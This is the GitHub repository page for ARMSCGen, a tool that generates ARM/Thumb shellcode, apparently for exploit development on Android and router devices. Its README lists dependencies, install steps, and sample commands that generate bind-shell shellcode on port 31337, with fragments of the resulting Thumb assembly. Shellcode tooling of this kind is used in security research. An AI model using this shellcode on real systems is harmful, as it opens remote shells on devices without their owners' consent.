ARM Shellcode Generator
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
asem
asm
docs
examples
sctest
shellcodes added sctest using unicorn engine Aug 26, 2017
xorencoder
.gitignore added .gitignore Sep 1, 2014
ARMSCGen.py
LICENSE Initial commit Aug 30, 2014
LICENSE-ARMSCGen.txt
README.md Update README.md Aug 26, 2017
requirements.txt
scgen.py
setup.py
shellcodes_lists.md

README.md

Shellcodes for ARM/Thumb mode

Ideas came from shell-storm and pwntools/pwnies.

Thanks to share all of brilliant sources on the net.

I'm interested in mobile platform and archtecture like Android on ARM, Router on MIPS and so on.

This project named ARMSCGen focus on shellcode on ARM Architecture especially ARMv7 Thumb Mode.

  • updated: v0.0.20
    • added sctest for emulating shellcodes using unicorn-engine
    • removed test code related to unicorn-engine in scgen.py

Requirement

ARMSCGen highly depends on {capstone|keystone|unicorn}-engine.

Capstone is needed to disassemble codes. Install Capstone with:

$sudo pip install capstone

Keystone is needed to assemeble shellcodes. Install Keystone with:

$sudo pip install keystone-engine

or refers to here

Unicorn Engine is needed to emulate shellcodes. For installing Unicorn Engine, refers to here

Installation

$sudo python setup.py install

Usage

reads examples directory (some examples has been outdated)

and

uses scgen.py in CLI mode

List of Shellcodes

please refer to shellcodes_lists.md or scgen -l -a all

Notes

Some of thumb mode shellcodes have new option named version.

If you'd like to test shellcodes on old kernel like 2.x then

try to use this option. for example

# linux kernel 2.4 - socketcall
$ scgen -a thumb bindshell 31337 4 2 0 -f a

/* socketcall( socket, { 2, 1, 6 } ) */
movs r1, #2
movs r2, #1
movs r3, #6
push {r1-r3}
movs r0, #1
mov  r1, sp
movs r7, #102
svc 1

# linux kernel 3.x or later
$ scgen -a thumb bindshell 31337 4 3 0 -f a

/* socket(...) */
movs r0, #2
movs r1, #1
subs r2, r2, r2
subs r7, r7, r7
adds r7, r7, #255
adds r7, r7, #26
svc 1 

Documentation

(need to upgrade) URL: http://armscgen.readthedocs.org/ or /docs/ in source

TODO

writes shellcodes precisely and writes docs in detail

(To be continued)